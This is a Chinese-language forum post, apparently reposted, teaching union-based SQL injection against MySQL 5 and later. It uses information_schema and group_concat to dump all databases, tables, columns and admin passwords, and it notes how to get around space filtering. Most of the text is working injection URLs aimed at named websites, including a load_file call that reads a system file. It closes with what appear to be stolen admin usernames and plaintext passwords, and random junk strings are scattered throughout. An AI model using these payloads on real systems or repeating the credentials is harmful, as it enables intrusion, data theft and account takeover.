此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似: X7 J) p1 E" s# A' N, V2 c% a# e* i& i
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人5 a* I. R, r7 S2 K! k
8 I/ I8 K+ n" [/ G. C$ }
. n. L* z. Z, L h+ _9 s2 X5 G优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入0 m# I1 c4 I0 i8 }
/ p8 z7 |1 W. K# T3 J3 z* Z
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...- O# o9 c8 L0 v, f
" J# W) t: O3 }7 g% D) w3 m下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示* H- S- p& S. W2 f
在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等
! J5 f5 i" n9 c" o" K3 Y. i3 Y( j7 a# p
6 o9 Y/ W# K' y7 ~! F( A9 Ehttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17/ K( ]- Z+ f) B9 {! V! K
. x9 n$ m/ _( D3 K3 J/ T8 E# i读出所有库:$ F) j# y& J/ g4 x% g
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
9 l& N, x& x1 c
6 v+ h: r( p2 o- |( [
1 g* U1 V. b2 |' q0 Z4 X- y5 J7 F1 e4 r6 d( P
读出所有表:9 u* |& [( I% I) |2 Y9 r3 m
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()8 Z9 a* @. b3 L. b" q
) ]5 z7 K6 B: W7 [0 j6 ^
读出所有表字段:
; E5 I1 h, n) M# F. Zhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)
9 ]" o6 S. A* m( V% [- n# k*/ (97,100,109,105,110)为admin的ascii码 依次类推: g; X1 U7 D a0 D0 E0 ], ?
1 A, F% x% I4 m6 m读出所有表字段里的内容:
: a; ?* k1 A+ Xhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
- P) G' \/ E9 N* F5 m( [5 O1 o+ r: D Q
' V2 M$ d3 R) J) y: ~- W+ q1 u6 |& }% ]
8 x0 k) p: e; }2 y; u4 Y
$ K2 [5 t! Q H. V3 u! h, Z& B" W& i# t
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
) v. ?9 Y3 b- w, i0 I( b9 Y, v" G( `# v2 r% o- ^
1 k8 x2 d( ~" P5 A: r
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
( [ p0 G! c; X. Q) ]+ W6 I
, t+ e/ S# p. H: l# }6 ehttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%232 h- ^4 p# }& N: B4 i
; x5 H G$ A h. D
' v2 P9 {7 @8 y5 `
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
5 ~/ }9 t( q8 c0 I* p
' v1 h# o) t4 y% U& k1 p/ {1 ^( L. ?
webmaster:dzb521123,simlab:simadmin20043233" r0 ]; l3 L' o+ d% h0 X! x8 C! F) s
|